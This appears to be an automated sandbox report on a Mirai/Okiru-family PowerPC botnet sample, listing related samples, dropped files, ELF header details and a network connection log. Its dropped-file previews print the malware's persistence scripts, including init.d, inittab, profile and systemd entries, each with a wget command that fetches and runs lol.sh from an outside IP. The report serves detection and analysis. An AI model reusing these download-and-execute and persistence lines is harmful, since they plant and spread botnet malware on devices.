	db0fa4b8db0333367e9bda3ab68b8042.arm.elf	Get hash	malicious	Unknown	Browse
	bin.sh.elf	Get hash	malicious	Unknown	Browse
	mipsel.elf	Get hash	malicious	Unknown	Browse
	.i.elf	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	db0fa4b8db0333367e9bda3ab68b8042.mpsl.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	RpcSecurity.arm5.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	RpcSecurity.arm7.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	RpcSecurity.ppc.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	RpcSecurity.arc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	RpcSecurity.sh4.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	db0fa4b8db0333367e9bda3ab68b8042.arm5.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	db0fa4b8db0333367e9bda3ab68b8042.ppc.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	db0fa4b8db0333367e9bda3ab68b8042.arm.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	bin.sh.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
CANONICAL-ASGB	db0fa4b8db0333367e9bda3ab68b8042.mpsl.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	RpcSecurity.arm5.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	RpcSecurity.arm7.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	RpcSecurity.ppc.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	RpcSecurity.arc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	RpcSecurity.sh4.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	db0fa4b8db0333367e9bda3ab68b8042.arm5.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	db0fa4b8db0333367e9bda3ab68b8042.ppc.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	db0fa4b8db0333367e9bda3ab68b8042.arm.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	bin.sh.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
INIT7CH	db0fa4b8db0333367e9bda3ab68b8042.mpsl.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	RpcSecurity.arm5.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	RpcSecurity.arc.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	RpcSecurity.sh4.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	db0fa4b8db0333367e9bda3ab68b8042.arm5.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	db0fa4b8db0333367e9bda3ab68b8042.ppc.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	db0fa4b8db0333367e9bda3ab68b8042.arm.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	bin.sh.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	mipsel.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	.i.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
NETIXBG	x86_64.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sparc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234
	arm.nn-20241224-0652.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mips.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm5.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/rc.local	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm.nn-20241224-0652.elf	Get hash	malicious	Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/powerpc.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	129
Entropy (8bit):	4.628289862910153
Encrypted:	false
SSDEEP:	3:KPJRXgzpJDFDDoCvLdjX43LbaaFOdFXa5O:WJRgrZfoYZX47baaeXCO
MD5:	AEF4F0C23214770CBBC7303556CDE1D7
SHA1:	566ADDE8FE217D90C8DC2BF1A24B9BF033A6C017
SHA-256:	A6523F829D13FBD9352945D290012DC90F0BD9FEE034F9F3E9416FAEA64DF01A
SHA-512:	50140C58CFCFA2EFD7D3F5610177E4FFD148B3304E285CA59B43F0FD123C869596FC8E47C35A45CD3FB3556D6861C73F7EF47B873259233D25B63AD880547A81
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /tmp/powerpc.nn.elf && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/powerpc.nn.elf

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	421
Entropy (8bit):	4.54879019053483
Encrypted:	false
SSDEEP:	12:QRkgXNxrxKUJgjvMrF+uKN+dRRucSOyd3:6x1IYFYOM3
MD5:	7197DA53CFDEE6052569983699F64E69
SHA1:	5B07B57533E89381ED41596569D3EE0BE4754714
SHA-256:	31E4519A9C0E204C6140C7A4E377309363A58E1615ED05E864EAD0B94E636E69
SHA-512:	AF5CEA64ED33F7413D7604C32F63868BA8CB2E82A96BCAA00B7986A2D6AC9CDE341D11ABC78460B2D5EF61A041029DB2B18E98C00910CD4FB68B9D70F59C68D4
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/powerpc.nn.elf..case "" in. start). echo 'Starting powerpc.nn.elf'. /tmp/powerpc.nn.elf &. wget http://94.156.227.229/lol.sh -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping powerpc.nn.elf'. killall powerpc.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/powerpc.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.6198881019260805
Encrypted:	false
SSDEEP:	3:TKH4vZKgzpJDFDvSDRFiLdjX43LpaKB0dFLoKE0:h8grZzSXoZX47zBeLXE0
MD5:	C88C8C7E36CC0451320B6C17EA83C314
SHA1:	AB1212186BDB893CEAD65DE89D5E0CD3E029B844
SHA-256:	7BA542A8D17E5349EF1184878F0077C5A25AE373251FA4BFF499D16283065709
SHA-512:	F4C018A106252416153A1F17E2EACEEAE459F5D7992D2A5422D8D7CCF844EBA969144D5289A7FE27F8C4F275199156F58C2434ABBF035F73507163EAFF1E882B
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh./tmp/powerpc.nn.elf &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/powerpc.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	121
Entropy (8bit):	4.554598683088093
Encrypted:	false
SSDEEP:	3:nAWu52zpJDFDDoCvLdjX43LbaaFOdFXa5O:AorZfoYZX47baaeXCO
MD5:	D3954A5B40C51CF0C3F129B0F1537905
SHA1:	7C60C203DC2373EBD79D85CFE50019CB5BBDDADC
SHA-256:	CA4E8F8E957872825927EB6B61F57B89A4EE2A127FE61F954183589D9EAE410A
SHA-512:	C10B47095CE01291DA14807FEB071455DCE7D83630830D5E966FB27BD4D695755C1EEC064FABD40E248C458C1E91A21CB8ECCE931D8B9C3821C52688C0DF5437
Malicious:	false
Reputation:	low
Preview:	::respawn:/tmp/powerpc.nn.elf && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/powerpc.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/powerpc.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	112
Entropy (8bit):	4.473756997643589
Encrypted:	false
SSDEEP:	3:TggzpJDFDvSDRFiLdjX43LbaaFOdFXa50:TggrZzSXoZX47baaeXC0
MD5:	34C9925D66B1DF0DEA71D3301B7C8972
SHA1:	E572BD960156D7D8567344792DF1FD3F2E5CB3EC
SHA-256:	F82C18F17EC5734974B0FBA4FC82B0C8EA3A5AD053206554F4F0BF53908A3F24
SHA-512:	42770753E40F786EA7A486D9A9ECBCADF554099E73464A1FED4FE09AE1B8634000EBC98EFD328BCE7BBBD851B23A8606F3E971540AB10A9628E61EFE6C75A366
Malicious:	true
Reputation:	low
Preview:	/tmp/powerpc.nn.elf &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/powerpc.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: powerpc.nn.elf, Detection: malicious, Browse Filename: sparc.nn.elf, Detection: malicious, Browse Filename: arm7.nn-20241224-0652.elf, Detection: malicious, Browse Filename: arm.nn-20241224-0652.elf, Detection: malicious, Browse Filename: mips.nn.elf, Detection: malicious, Browse Filename: m68k.nn.elf, Detection: malicious, Browse Filename: arm5.nn.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/powerpc.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	310
Entropy (8bit):	5.042022707491449
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+Urz02+GWRAZX47N2+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+U/p+GWRkKY+GWRXY+GWRuO
MD5:	63FDEB394565110FDD9B5E05C1AAF9C7
SHA1:	D63FBF7A8C17E49315DC7C6B13955C356077FFC9
SHA-256:	646D172C61E45C4D24DDC2130DF45FF055E7A02FD93A9FFC8453CFB096F4E43C
SHA-512:	10AE0A563FE9DA7F477684D725128252F1978A13CD3CF1C42304A2078116D7269B1B92AA4C0304DD774AB187A28D23AA9691809DEA3FFE45A2CE0BFD90B37851
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/powerpc.nn.elf.ExecStartPost=/usr/bin/wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.b58Zav (deleted)

Download File

Process:	/tmp/powerpc.nn.elf
File Type:	data
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.684183719779189
Encrypted:	false
SSDEEP:	3:TggzpJDln:Tggr5n
MD5:	3613970D3EE99A4E79418B3D50DD068E
SHA1:	0924DD5DC5D93B8E039D25A958AB8F9B13716AF7
SHA-256:	B161506DF184EF3F0AAB6A26EB9F22F81B6225876EC250AF1F8794A731C82F01
SHA-512:	B3C0A28198FB6C862279CA2C39A3CCF910237A39861F9C62BD8818A855755E0F7A9C19B4306F77B0D9AD73C988570BE74A6AC22BDDA958D4A0C85D333EF4F9C1
Malicious:	false
Preview:	/tmp/powerpc.nn.elf.

Static File Info

General

File type:	ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.377870839296606
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	powerpc.nn.elf
File size:	88'316 bytes
MD5:	27556d2513e616e4e82a3c0f316bf211
SHA1:	ccf04ec9ee1f0e89f3bf22ef622413cfb234eb07
SHA256:	d16abea205781840fd8919c949b3723df682ea58c0caadfa5f138d4aa1d25f09
SHA512:	72f6a826a10e1b86aac6971e78bde12401ed095ee9468cd0e79ec1f8833abaed8b8f6dc9d78415547bdf67b1a250db0e79072623790623ae5cb822962ef18812
SSDEEP:	1536:Ijcb5ed2bfhCSZcxPg1ll6PR0oSON1ajLhqOJn+Ju5VZ4RJ9PEEI0:T5vZAPR0JOKv/+JuKRzEEn
TLSH:	D9835C03731C0A43D1E719F02A3F47E1D3FAAA9111F4B684650EEB4A91B5E36558AFCD
File Content Preview:	.ELF...........................4..W......4. ...(......................Q...Q...............Q...Q...Q.......&.........dt.Q.............................!..\|......$H...H.+....$8!. \|...N.. .!..\|.......?.........W8..../...@..\?.....R..+../...A..$8...})....R.N..

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	PowerPC
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x100001f0
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	87836
Section Header Size:	40
Number of Section Headers:	12
Header String Table Index:	11

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x10000094	0x94	0x24	0x0	0x6	AX	4
.text	PROGBITS	0x100000b8	0xb8	0x12b74	0x0	0x6	AX	4
.fini	PROGBITS	0x10012c2c	0x12c2c	0x20	0x0	0x6	AX	4
.rodata	PROGBITS	0x10012c50	0x12c50	0x25a8	0x0	0x2	A	8
.ctors	PROGBITS	0x100251fc	0x151fc	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x10025204	0x15204	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x10025210	0x15210	0x484	0x0	0x3	WA	8
.sdata	PROGBITS	0x10025694	0x15694	0x3c	0x0	0x3	WA	4
.sbss	NOBITS	0x100256d0	0x156d0	0x68	0x0	0x3	WA	4
.bss	NOBITS	0x10025738	0x156d0	0x21ac	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x156d0	0x4b	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x10000000	0x10000000	0x151f8	0x151f8	6.4034	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x151fc	0x100251fc	0x100251fc	0x4d4	0x26e8	4.7381	0x6	RW	0x10000	.ctors .dtors .data .sdata .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 09:13:52.186223030 CET	43928	443	192.168.2.23	91.189.91.42
Dec 27, 2024 09:13:52.653393030 CET	60004	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:52.773042917 CET	38242	60004	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:52.773109913 CET	60004	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:52.773536921 CET	60004	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:52.893026114 CET	38242	60004	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:53.437150002 CET	60004	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:53.601835966 CET	38242	60004	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:54.039959908 CET	38242	60004	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:54.040015936 CET	60004	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:54.446952105 CET	60006	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:54.566466093 CET	38242	60006	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:54.566529989 CET	60006	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:54.566562891 CET	60006	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:54.686084986 CET	38242	60006	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:55.086474895 CET	60006	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:55.250627041 CET	38242	60006	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:55.768313885 CET	38242	60006	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:55.768376112 CET	60006	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:56.104135036 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:56.223630905 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:56.223694086 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:56.223737955 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:56.345484972 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:56.742552996 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:56.902698040 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:57.349150896 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:57.349258900 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:57.565407991 CET	42836	443	192.168.2.23	91.189.91.43
Dec 27, 2024 09:13:57.790724039 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:57.911120892 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:57.911206007 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:57.911253929 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:58.031258106 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:58.418884039 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:58.582616091 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:59.080579042 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:59.080683947 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:59.353249073 CET	42516	80	192.168.2.23	109.202.202.202
Dec 27, 2024 09:13:59.421387911 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:59.541205883 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 27, 2024 09:13:59.541275978 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:59.541369915 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:13:59.661706924 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:00.190140963 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:00.351074934 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:00.735717058 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:00.735780954 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:01.192734003 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:01.312329054 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:01.312410116 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:01.312484980 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:01.431998014 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:01.820388079 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:01.986622095 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:02.437150955 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:02.437227964 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:02.821471930 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:02.941023111 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:02.941179991 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:02.941179991 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:03.060688019 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:03.448446989 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:03.614675045 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:04.193389893 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:04.193490982 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:04.452235937 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:04.571921110 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:04.572035074 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:04.572035074 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:04.691792011 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:05.078915119 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:05.238605976 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:05.719985962 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:05.720091105 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:06.079853058 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:06.199749947 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:06.199877024 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:06.199907064 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:06.319709063 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:06.703824997 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:06.866744041 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:07.381058931 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:07.381165981 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:07.705532074 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:07.825069904 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:07.825206995 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:07.825247049 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:07.944914103 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:08.329962969 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:08.490876913 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:09.028493881 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:09.028748035 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:09.331799984 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:09.451420069 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:09.451708078 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:09.451708078 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:09.571382999 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:09.956882000 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:10.118680954 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:10.614309072 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:10.614423990 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:10.958920002 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:11.078598976 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:11.078726053 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:11.078764915 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:11.198471069 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:11.582242012 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:11.746758938 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:12.155468941 CET	43928	443	192.168.2.23	91.189.91.42
Dec 27, 2024 09:14:12.202544928 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:12.202622890 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:12.583028078 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:12.702750921 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:12.702821970 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:12.702852011 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:12.822706938 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:13.206787109 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:13.366632938 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:13.890666962 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:13.890762091 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:14.207690001 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:14.327284098 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:14.327382088 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:14.327415943 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:14.446985960 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:14.831995010 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:14.994729042 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:15.517940044 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:15.518009901 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:15.833555937 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:15.953463078 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 27, 2024 09:14:15.953582048 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:15.953615904 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:14:16.073443890 CET	38242	60032	94.156.227.234	192.168.2.23
